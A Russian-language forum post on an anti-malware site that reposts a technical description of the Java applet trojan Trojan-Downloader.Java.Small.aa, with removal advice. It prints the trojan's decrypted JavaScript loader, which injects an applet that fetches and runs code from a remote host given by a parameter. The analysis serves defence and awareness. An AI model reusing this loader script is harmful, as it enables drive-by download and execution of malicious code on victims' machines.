Добро пожаловать на независимую площадку Stop Malware.
Показано с 1 по 1 из 1

Тема: Trojan-Downloader.Java.Small.aa

Понравилась статья? Поделись с друзьями!
  1. #1
    Аватар для x-sis
    x-sis
    x-sis вне форума

    Местный
    Регистрация
    11.07.2011
    Адрес
    Россия, Волгоград
    Сообщений
    185
    Поблагодарил(а)
    52
    Благодарностей
    124

    Trojan-Downloader.Java.Small.aa

    Технические детали

    Троянская программа, загружающая файлы из сети Интернет без ведома пользователя. Является JAR-архивом, содержащим набор Java-классов (class-файлы). Имеет размер 3556 байт.

    Деструктивная активность

    Вредоносный JAR-архив содержит следующий набор файлов:
    Meta-inf\Manifest.mf (25 байт)
    applet.class (5482 байта)
    util.class (407 байт)


    Основной функционал вредоноса реализован в классе "applet". Вредонос является Java-апплетом и запускается с зараженной HTML-страницы при помощи тега "<APPLET>". Вредоносный апплет запускается с двумя параметрами:
    id
    uid


    Троянец содержит в своем теле в зашифрованном виде скрипт языка JavaScript. После запуска троянец расшифровывает данный скрипт и запускает его при помощи функции:
    getAppletContext().showDocument

    Расшифрованный скрипт имеет следующий вид:
    javascript:function fudBfudW()
    {
    try
    {
    var antgantd=document.createElement('applet');
    antgantd.setAttribute('codebase', 'file:C:\\Program Files\\
    Java\\jre6\\lib\\ext');
    antgantd.setAttribute('code', 'http://<значение параметра
    "id">/options');
    buyvbuyc=document.createElement('param');
    buyvbuyc.setAttribute('name', 'uid');
    buyvbuyc.setAttribute('value', '<значение параметра " uid">');
    antgantd.appendChild(buyvbuyc);
    document.body.appendChild(antgantd);
    }
    catch(e)
    {
    document.write('');
    setTimeout(fudBfudW, 1000);
    };
    };
    fudBfudW();




    Таким образом, запуск скрипта приводит к запуску Java-апплета, class-файл которого расположен по адресу:
    http://<значение параметра "id">/options

    Апплет будет запущен с параметром "uid", значение которого равно переданному вредоносному апплету параметру "uid".

    Рекомендации по удалению

    Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

    1. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).

    2. Произвести полную проверку компьютера Антивирусным с обновленными базами.

    Источник: http://www.securelist.com/ru/descrip....Java.Small.aa
    http://ProvisionSecurity.ru - об информационных технологиях, о жизни, обо всём.

  2. 1 пользователь сказал cпасибо x-sis за это полезное сообщение:

    Aibolit (03.08.2011)

 

 

Похожие темы

  1. Trojan-Downloader.Win32.Small.bsdo
    от x-sis в разделе Описание вирусов
    Ответов: 1
    Последнее сообщение: 03.03.2017, 03:28
  2. Trojan-Downloader.SWF.Agent.ec
    от x-sis в разделе Описание вирусов
    Ответов: 1
    Последнее сообщение: 12.09.2011, 21:56
  3. Trojan-Downloader.Java.Agent.ly
    от x-sis в разделе Описание вирусов
    Ответов: 0
    Последнее сообщение: 11.08.2011, 00:57
  4. Trojan-Downloader.JS.IstBar.cx
    от x-sis в разделе Описание вирусов
    Ответов: 0
    Последнее сообщение: 11.08.2011, 00:19
  5. Trojan-Dropper.Win32.Small.cfs
    от Aibolit в разделе Внимание!!! Важно знать!!! Новые зловреды и уязвимости
    Ответов: 0
    Последнее сообщение: 28.05.2011, 18:52

Социальные закладки

Социальные закладки

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •